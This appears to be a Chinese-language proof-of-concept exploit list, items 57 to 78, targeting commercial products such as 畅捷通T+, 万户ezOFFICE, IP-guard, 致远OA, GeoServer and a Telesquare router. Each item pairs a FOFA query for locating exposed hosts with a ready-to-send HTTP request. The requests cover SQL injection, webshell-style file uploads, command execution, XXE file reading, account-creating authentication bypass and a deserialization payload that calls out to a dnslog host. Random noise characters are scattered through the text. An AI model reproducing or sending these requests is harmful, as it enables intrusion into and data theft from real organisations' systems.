4 v& R9 }+ k! [7 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.368 z6 S* }$ W8 q* T2 l0 K5 ]
Content-Type: application/json3 \4 L6 a# g+ v5 d1 t
9 E+ [. y; X9 f O+ V4 M{" |) l: b. y) T5 b% e8 Z
"storeID":{
1 r& o4 A; j5 Y" Q5 H$ }1 h "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 _/ ^! i' H) g: p; ?- w "MethodName":"Start",
2 C8 }2 S( U+ f$ c "ObjectInstance":{8 n4 u% T9 X- A7 q1 u! c% h+ y$ W
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) P, F4 c3 d ]$ p' F' e. ^5 ]8 c$ I
"StartInfo": {
$ T) Q/ `% p. H0 g3 B "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. w( A; o, k- S% k
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"2 A0 A' C8 \3 Q* a- X# s" }
}
6 B& x6 `/ Y* |& n' G, i( C! J }
' ], Z9 Q' v* x0 e- \9 C( t }
1 d' U7 H5 ]4 g" P, y4 c1 ~}* l" K$ p7 s$ H; a6 L* F
$ A4 e1 q7 }/ ?+ w# \0 |5 n
5 m5 Q' U+ H6 ?! P57. 畅捷通T+ keyEdit.aspx SQL注入
$ n* q Z# D- K. M1 q% [FOFA:app="畅捷通-TPlus"9 w( q9 J' Y- ^5 Z9 n
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1# A( E6 `( ?/ T$ |
Host: host
$ w. _% b: _* cUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! _' V; f4 q$ fAccept-Charset: utf-84 X3 \9 r' _" O9 @9 d
Accept-Encoding: gzip, deflate
' y0 b: _, v- g) R6 l* ^" |$ UConnection: close$ i& e. M+ N. w: P% T% e j A9 _& t6 \
0 R+ L) {- i* i' J8 h+ L, D: k# V6 c+ E
58. 畅捷通T+ KeyInfoList.aspx sql注入( m: @/ z1 B0 J" e9 E
FOFA:app="畅捷通-TPlus"3 H; z G! w0 m, ], J$ Q- Z
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
c+ _) ^) I" a/ @3 RHost: your-ip! n; o- _- o7 y& O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, W! k% M* [# Z# j1 G ?. S" ~& T
Accept-Charset: utf-8
9 F4 g2 \% X- l: O6 I- ~Accept-Encoding: gzip, deflate' H. T6 }# }9 W7 h
Connection: close
: U V/ |7 i, }! I( Q% P7 {5 k8 K
: s/ e+ z0 V8 @; M& ]- Z: ]6 x1 G$ e/ M) [/ o. X- Q: k
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, e; x2 H# b% q! A6 d+ k9 pFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"1 N$ O% P* c8 I* U
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+ e. u2 M. R3 L1 m% z8 }/ yHost: 192.168.86.128:9090
8 S2 m8 h$ J& @User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- W7 R7 k) s& G$ b& l1 P* P8 MConnection: close
4 {, Q0 Y+ q: |- wContent-Length: 1669
; Z* b" z) D/ ]# ^( b" @' RAccept: */*( z/ P6 \ H7 z, z# \
Accept-Language: en5 P! j8 |% U" k" t, Q
Content-Type: application/x-www-form-urlencoded7 s. O! h$ e+ {8 l6 \
Accept-Encoding: gzip
! Z' ]& |4 C. _# k' U
# J, C1 x8 O& G' ]PAYLOAD1 \- M4 v1 t+ |% a: ^6 f
1 m* ?3 P* L% ~% X# ?$ ^7 {5 Q) v p* E* p! s( E+ ~& k" Y
60. 百卓Smart管理平台 importexport.php SQL注入
8 x1 z% S% f/ d- d6 W5 X2 p$ RFOFA:title="Smart管理平台"
7 m& O& ^/ P+ G4 R0 \7 j3 [7 m1 XGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1! I: M- t; }; D {/ R
Host:
! O7 E0 f+ x# W, y5 t# wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
p0 _3 h. A; ?, j- N QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; z1 Z% U. q- F# F: ~/ X, x( h' u# W
Accept-Encoding: gzip, deflate+ S; Y2 g# r/ e
Accept-Language: zh-CN,zh;q=0.9
- M5 k8 B4 V# O3 IConnection: close' ^( `1 _; `) c6 T
z; r. E2 [. Q! c& f: z# D$ k
$ b& O6 c" B3 h0 x: I* _61. 浙大恩特客户资源管理系统 fileupload 任意文件上传) J+ X8 B9 w9 @/ F2 o
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
' ?3 N- C& t/ w2 JPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1" X' _9 y+ T& p: \8 b5 N
Host: x.x.x.x; i2 g+ E7 |! s1 z- H& k: [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ g7 M3 F7 F: A6 p! A1 ^
Connection: close- s1 z8 W6 `, _8 l
Content-Length: 27
( T' H' `" ?: jAccept: */*
/ v5 s [! X( n8 P) s1 \7 ~Accept-Encoding: gzip, deflate! T ?( t/ @7 w; i7 I+ I Y' [
Accept-Language: en
, Z/ [4 z- }" R7 r6 BContent-Type: application/x-www-form-urlencoded( d# f1 }; p* O5 y# ~# }
5 ]- P4 |1 X5 G* g* t9 `8uxssX66eqrqtKObcVa0kid98xa
/ C: I4 f2 D* I5 L% L
+ ?. O/ ?! r5 Z& c: ]! g3 C2 t) d" B+ |; r% \$ W5 {% Q
62. IP-guard WebServer 远程命令执行
4 ?- T+ c$ W$ v( CFOFA:"IP-guard" && icon_hash="2030860561"
" b1 v: p8 b/ d( G! b: fGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 v0 C. l. Y$ s! y3 z* ^
Host: x.x.x.x
: g k2 C: S% ]9 U- s1 kUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36- E2 i8 l6 Q" y! N6 `1 R: J, m$ f0 M
Connection: close
# \& G; B: E2 [% yAccept: */*2 H) m8 s% G, M3 t- |) x* U% h9 R
Accept-Language: en/ P7 D/ M7 N. X5 x: X7 L6 G
Accept-Encoding: gzip* k3 Q4 G% h, \% [
! d6 P* k( q. x, {6 r; K o, b( s4 H) S2 F3 C' \: Z8 b5 m
访问
5 u0 M' L6 x: D. R
- h+ R: f4 q! e b' L/ xGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
# I% W. j9 D- n1 _( x* L0 p2 kHost: x.x.x.x
/ F8 D* V3 p% R0 D+ [/ Z, G3 S X/ Y9 L% X
/ r5 F P/ e( L- |63. IP-guard WebServer任意文件读取
1 n3 Q/ ]( K* D) L8 O/ P( q& OIP-guard < 4.82.0609.0
! A2 c% _# v% U5 J) }9 S4 uFOFA:icon_hash="2030860561". @* H* \' Q: ?& i
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1' Q+ j$ q: E# p# Q& M) I- X; O
Host: your-ip
6 H! E% l' c' D+ B. ^+ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- W7 b& [4 W. F3 P: J! s6 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Y$ z9 O6 Z) e2 k! V! L$ `Accept-Encoding: gzip, deflate2 \( Q9 A7 ]$ H$ R! V' P
Accept-Language: zh-CN,zh;q=0.9
* p- q$ k0 ^8 E6 M* V. d3 S) h" Y5 lConnection: close4 k0 E' }7 B( ?' E/ D2 A
Content-Type: application/x-www-form-urlencoded5 n! m/ z" q/ G' R9 [6 y
3 k; r1 v1 A7 t e" Y+ p- O
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
: A. r8 m/ F' b) L7 h! W6 x+ P. A7 K+ [3 H) W/ l
64. 捷诚管理信息系统CWSFinanceCommon SQL注入" i% e; m2 U8 q, ^" J
FOFA:body="/Scripts/EnjoyMsg.js"
& y& {1 t2 W" ?0 D( |2 G7 GPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
6 e1 {3 p3 z3 o0 [0 Z6 HHost: 192.168.86.128:9001, K9 b' e0 h' m+ h" d8 A
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.366 y7 L" u4 I7 d5 Q: J& w
Connection: close) L# y: f; |- m( U$ n8 \+ c
Content-Length: 3691 |3 S3 a7 j' ^0 H# J7 N- s
Accept: */*' p7 Q J0 T4 {% L& P( B
Accept-Language: en
+ t3 J4 R- t. O$ s( q- JContent-Type: text/xml; charset=utf-8
1 I6 d+ k3 S6 @, @- D) C6 MAccept-Encoding: gzip% L6 B) L4 Z$ ?/ { X
, g* g1 m ^# F' F
<?xml version="1.0" encoding="utf-8"?>
) v3 e6 G0 l2 [/ G) V# @<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" O7 ]5 K! ~. d0 T2 n
<soap:Body>
+ |6 ` b" E) b3 | <GetOSpById xmlns="http://tempuri.org/">4 u7 l! X$ o9 R- i
<sId>1';waitfor delay '0:0:5'--+</sId>" m P" J0 K6 [8 {
</GetOSpById>1 u; a& Y9 _! I- N2 ~. t% j" n( r
</soap:Body>
; n" H* `+ U# \0 _& y</soap:Envelope>
0 u: j6 f; N" K2 `
A) L, W6 g$ J3 e; ?- p6 m6 d: P$ T
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' c0 S( y9 o4 s- r0 i( V+ w) R
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"3 T; G, F* v+ X1 e3 o( F' n
响应200即成功创建账号test123456/123456
* _ W3 f' ~% c% r! iPOST /SystemMng.ashx HTTP/1.15 Y; R& }5 u9 @5 E
Host:: [# J$ K+ i4 D) w; W& k* x1 W
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1). |' b* o: [8 c& c- Z- b& q7 L
Accept-Encoding: gzip, deflate
' e; o7 p- M; ^/ VAccept: */*4 P$ [1 r% I2 h+ k* T1 l: W
Connection: close
7 J8 R2 Y% K; @. H2 ] vAccept-Language: en* m; f' X$ _% s
Content-Length: 174
, E" k h1 O" x6 S' X, p3 `+ f9 o/ l
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators, m- r4 w' Q% P% i# b) v: P7 z: z2 n
8 ]2 ]3 o% F* g, P
: S3 p% A, v8 [( o66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入# l8 l# C1 D( q' i, B) r Q
FOFA:app="万户ezOFFICE协同管理平台"
2 I) O; W5 |9 D& E' V; b
2 P5 ^* X5 p6 h( fGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
: r1 f2 e. O: u) C. g" }Host: x.x.x.x5 w. W Q" G* E0 f. r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 i( P) t2 M- p- V: |
Connection: close2 a/ O1 C* P/ n7 ?/ i g- z
Accept: */*$ l/ _ V* D6 r
Accept-Language: en- u$ C, a" P5 t: l" Q( }
Accept-Encoding: gzip
; ]0 J: {7 \9 k2 M
& {" X- Z) b' Y4 t! U# {7 V1 z" I* G2 f3 b
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
4 l2 G" {- u6 f: o% L# H
" w9 @; D( s- p! p. l67. 万户ezOFFICE wpsservlet任意文件上传
7 q. @ r) T7 H3 B H& OFOFA:app="万户网络-ezOFFICE"
0 _% P9 M6 I$ A( P( R1 d2 g6 hnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型$ Q+ j6 D2 Z& B9 I4 A
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 b7 S$ _! W: l& y2 K. Q
Host: x.x.x.x
, P% z2 O v! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+ m, n% M& V# F' G: ^4 fContent-Length: 173
6 z/ t! o/ O( p h, `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
q4 _# m A6 m) R$ [Accept-Encoding: gzip, deflate
, z! A3 X& J7 S `! f- G, dAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3! a0 f4 u3 d7 ^0 c3 D$ V( h# x
Connection: close/ @; ~0 A! I/ _+ S0 l
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp% O v+ h0 r+ t( h1 U* g7 ~
DNT: 1
+ y1 {# n" |' L8 o- M9 [8 x8 a' N: lUpgrade-Insecure-Requests: 1% c; P) A8 ^5 ^* E5 J- [5 L# B
* p# ]$ f; B, n, g7 f% H5 G
--ufuadpxathqvxfqnuyuqaozvseiueerp/ A5 Y! z) p" j" _
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! R9 @7 O: N0 e9 G0 S5 f7 t
0 R9 h. P% x5 t( ?! W* h$ ~
<% out.print("sasdfghjkj");%>! E6 m9 g- M m) e# x
--ufuadpxathqvxfqnuyuqaozvseiueerp--+ s8 c" w% m. o- R) ^; s
( S6 B6 _ H% ]- b) o. z3 p- U, y: t
0 _, o! |3 y, g$ t
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
3 z9 X' M- T* ~4 o& |" |5 W2 ] Q
1 c- j* q! Z+ B/ \- B8 d* E68. 万户ezOFFICE wf_printnum.jsp SQL注入
( Y+ J7 z- W$ ^3 y0 H& i* OFOFA:app="万户ezOFFICE协同管理平台"
! _) ^4 e. W: mGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1. n4 l* g0 E9 f6 B# M) x
Host: {{host}}. O, b" K8 T+ }7 L* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
. i# O1 a3 `1 a& l9 c5 pAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ a. {5 w( t [Accept-Encoding: gzip, deflate7 r$ [- I. N2 [- L
Accept-Language: zh-CN,zh;q=0.9; u: ?& h7 n& e# K
Connection: close
9 t( Q$ x9 a7 r( s' \6 p) E V, r* _: G
9 o& W% [: u) J# l: t8 i69. 万户 ezOFFICE contract_gd.jsp SQL注入2 Y; C8 J% x: F. ]0 }
FOFA:app="万户ezOFFICE协同管理平台"
# G! P4 s4 x. e6 JGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.18 ^0 c) w. x X* u; r
Host: your-ip; A! l- E; G" T* N
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, a1 F1 i/ r: a5 n, G. w/ t t$ zAccept-Encoding: gzip, deflate
3 \7 U$ d6 x+ M7 {& O% NAccept: */*
+ M3 W. h. F" ]9 {Connection: keep-alive
+ z- O* K) m* @5 E; }
' x; H( y( Z% M. H0 Q2 ~) q' j( v. A; C$ O
70. 万户ezEIP success 命令执行& x$ s# P/ ]2 ?5 V1 a3 G
FOFA:app="万户网络-ezEIP"
0 N# j' b6 Y, S0 JPOST /member/success.aspx HTTP/1.1: E: ~9 [# n$ A- A
Host: {{Hostname}}
' j* U, W! z& \2 q7 V: {( O1 Q! eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. R) _- E5 B# n1 N, ZSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
! T- j/ A6 t: Q. S# X3 ^Content-Type: application/x-www-form-urlencoded
3 Z+ l$ R' P" z, FTYPE: C
% I9 H2 z$ T0 [* f$ N! b5 ~Content-Length: 16702
5 g- P3 @; y/ h* [) A# ~# J4 n3 N! f( ]) m
__VIEWSTATE=PAYLOAD
- V2 ~& W* ^" b7 B0 T& B3 U, O* F* `
+ G2 c$ I! D) N* j
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( {. E4 G) g X9 @" d5 qFOFA:body="PM2项目管理系统BS版增强工具.zip". X2 s( n- B* h& h0 `0 _6 H
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1) s8 n( L7 C/ o# {- A
Host: x.x.x.xx.x.x.x2 f& }- }; c }
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.361 @: }& r1 m9 z( {% j3 E
Connection: close
( d; y* G! T5 E5 _% @, |4 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 f! [; _7 f* S' D; C
Accept-Encoding: gzip, deflate
& n4 G' m1 X+ b8 R3 B1 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ [, m) ]$ R8 e+ \2 I9 s; j6 }
Upgrade-Insecure-Requests: 1
t4 W p. s0 a& L# v! ^/ @
B. ^8 v& e; z0 M8 c- y9 I7 t$ l* c( O3 l1 u
72. 致远OA getAjaxDataServlet XXE
. L' a' M2 @3 J" ?FOFA:app="致远互联-OA") `8 @; r8 Y9 G1 i B
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 S: X# `) |, `' n; ?2 f
Host: 192.168.40.131:8099% i6 ]$ E: `4 d, W$ j
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! |3 B- v& O$ p) W( e D! E; p
Connection: close
$ b4 H0 @ e& j- v; NContent-Length: 583
8 X# }7 ]4 C+ w' K( YContent-Type: application/x-www-form-urlencoded! m0 @8 s7 k& O. X% H
Accept-Encoding: gzip. u6 j; n3 [7 p9 @* i+ k
; o% H# {5 ^6 wS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
I3 s8 V8 I% ?3 n' f) @
2 z$ j, f) u8 Q. j
& B- \# l R9 q73. GeoServer wms远程代码执行: s, m! C: } a& S& y; e/ G( s8 g
FOFA:icon_hash=”97540678”
* H% K) @5 F" \$ J+ r3 ~+ B; `' BPOST /geoserver/wms HTTP/1.17 n( s( f+ Y! P) h. J. ]5 d
Host:
) A# N2 V2 R1 N8 s! C& v/ M; bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( z1 p, U5 Q0 g' T4 `Content-Length: 1981& M0 y' @, }5 o/ K- L+ ^1 k
Accept-Encoding: gzip, deflate; x9 e" e8 W3 i2 J$ V; |1 N
Connection: close3 f) W# Q% Y4 _: P- f
Content-Type: application/xml; @& [1 U/ o) q5 m- H
SL-CE-SUID: 3
/ u7 S& b1 B& [% k3 m& F
% A1 p; q1 @5 }1 U8 D. EPAYLOAD
- ]) U6 U2 l8 P% v
6 `6 i6 i: _% r
/ {- q* _' G/ j, F74. 致远M3-server 6_1sp1 反序列化RCE; w# @. K: v# B) q. ]8 H8 X
FOFA:title="M3-Server"1 T6 M) W0 F, t+ r% A
PAYLOAD
" x7 ` q2 d) D" s: c! E/ g" r; [5 ]3 w& S, ^7 F7 f
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! W# t5 l% f$ r4 D. p `
FOFA:app="TELESQUARE-TLR-2005KSH"# {3 e& U2 R2 u3 z& j+ n. O
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1' t( J8 k9 V$ l4 l8 z- |! x9 Q
Host: x.x.x.x
: K3 d# ~! _/ e, R0 ~( VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 {; L" }5 a! ?0 m# @
Connection: close
6 W, u3 T; z6 J. ^5 {Accept: */*( I( M3 B5 T2 |+ F8 x
Accept-Language: en
+ A5 f" l+ r* ?Accept-Encoding: gzip
% X! ^& B5 u* c0 i8 t3 m2 L3 M3 ` n" t# R; b9 z6 o
* J9 w o/ N# T9 H5 V# f8 O. [GET /cgi-bin/test28256.txt HTTP/1.1
+ x( m5 R: N) ~Host: x.x.x.x/ ^7 b* l- s7 ^* Z
$ r7 a7 T) P: L6 _6 g" o+ @9 Y6 b. w8 o& i
76. 新开普掌上校园服务管理平台service.action远程命令执行1 }: m& G0 T7 ~/ s; D0 e
FOFA:title="掌上校园服务管理平台"
8 J3 D+ d1 M3 H" C9 J* APOST /service_transport/service.action HTTP/1.14 Y% t! s; i" S l/ U
Host: x.x.x.x$ T* c2 A- E% o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.06 S A# i1 R7 u2 P( O* o/ U; }
Connection: close
& ^# |* Q) G6 Y$ F- aContent-Length: 211
/ } f9 k V# V& e* y2 f: X. gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 t2 _. t; `& s: [' d
Accept-Encoding: gzip, deflate e4 C9 j( G8 c2 p2 \/ ]- R8 i9 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& S! P9 I4 Z. H' E
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4% i. j6 u, P: |
Upgrade-Insecure-Requests: 11 P* K% \, l# q# Q6 a+ T
* q1 a; i3 I1 @% f% U! J8 c
{
7 l. e: L. o2 D5 ^"command": "GetFZinfo",, `5 e- i6 g5 @- `
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 r8 z# {/ h3 F3 b ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"- M, X$ G* U3 N g: s4 a9 V
}* k$ z1 C% `/ F# F: q" G2 I5 [
5 Y& E/ {3 N# C( @+ g! h+ A% J, T' c# @; q% C: L' [) h; h4 m
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1, z7 w7 \! R! C% ^8 L
Host: x.x.x.x* D6 P! w6 M/ p. b$ M8 Z6 i/ O
% O+ R4 W4 o8 r) Z
( H3 J5 }. E8 @
9 X; y4 @! m1 i+ R s/ k
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
6 Q2 _# X6 j0 K* E3 _FOFA:body="F22WEB登陆"
3 n2 U( `0 S: a$ h, rPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
1 P9 @- I" \: t, m4 r7 kHost: x.x.x.x% U3 `6 U" s9 S, K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- `: t: j3 Y2 I3 D0 ?3 p/ WConnection: close) G5 D0 @2 ]7 y
Content-Length: 433- x$ p) B2 u! W3 H
Accept: */*
, J9 m! E) V6 qAccept-Encoding: gzip, deflate
. ~0 P D( ?6 O" {8 ZAccept-Language: zh-CN,zh;q=0.9
9 J V- T9 N& I$ [ s# Z; |Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
: C/ f# ^' q) N' _1 b' m7 Q
! ? `; W4 c2 u5 M s------------398jnjVTTlDVXHlE7yYnfwBoix
( ^1 \/ i5 } M" ?$ M6 ~Content-Disposition: form-data; name="folder"
; n3 @1 {; J# E3 {& i& S. z7 V; ~! L4 j$ p/ k
/upload/udplog' u$ l& M8 Z6 V
------------398jnjVTTlDVXHlE7yYnfwBoix( ^/ Q7 G, t% p. g% e. p3 z
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
3 u2 ]' m2 J6 J+ e5 sContent-Type: application/octet-stream
3 ^/ {# t) L2 e. }& F
( {( U& d7 o; d6 S3 l" `hello1234567
4 {3 G+ U4 ?7 \# L& N: |------------398jnjVTTlDVXHlE7yYnfwBoix
$ _7 L3 o2 L, N) mContent-Disposition: form-data; name="Upload"
5 K ?( L- i M0 w( [ _+ ]- w' j$ R$ Z, V
Submit Query4 Z6 v6 S9 n) a; e) _
------------398jnjVTTlDVXHlE7yYnfwBoix--
" _+ t' \* Z+ r% `& n5 O* }8 [: ~, b
: o( Y# N% [! b
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 m: w# e* m: F. YFOFA:icon_hash="2001627082"& W7 E1 g2 C6 d# |9 p
POST /Platform/System/FileUpload.ashx HTTP/1.1
4 o, q4 @% P: Y4 y. uHost: x.x.x.x
5 d7 _8 w! ^' l( t5 ]2 i {1 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( c" S F. q, X$ S" g- zConnection: close/ H, a, U' f' M( P. c- [
Content-Length: 336! Q6 I# }! _! m4 `3 n7 Z% i5 e# v
Accept-Encoding: gzip
( {0 v7 U+ V9 k' |Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) r) Z" s$ a7 r9 l- [! Y/ m3 e* K5 M( ?
------YsOxWxSvj1KyZow1PTsh98fdu6l
: w2 N9 k& @+ V( y* X7 UContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"' T+ V3 c. [& y" f5 \
Content-Type: image/png
@. f# J/ W; c( H3 W
% E6 r- L% Z4 ]+ FYsOxWxSvj1KyZow1PTsh98fdu6l5 e h+ U% |/ ~( e+ m: v
------YsOxWxSvj1KyZow1PTsh98fdu6l0 } B$ ` z6 [8 @) h$ e; h
Content-Disposition: form-data; name="target"
: ?# ?/ G Q7 ^$ H, [3 f1 B- V
, c+ f$ n" {' l/ ^3 T X/Applications/SkillDevelopAndEHS/
: L+ R7 d, X% Z" o------YsOxWxSvj1KyZow1PTsh98fdu6l--9 B4 l2 Q& @: c) x& ~
" b% j5 e* ^) u% n1 Y2 D. r$ H& `7 Y8 P0 u4 o% E b
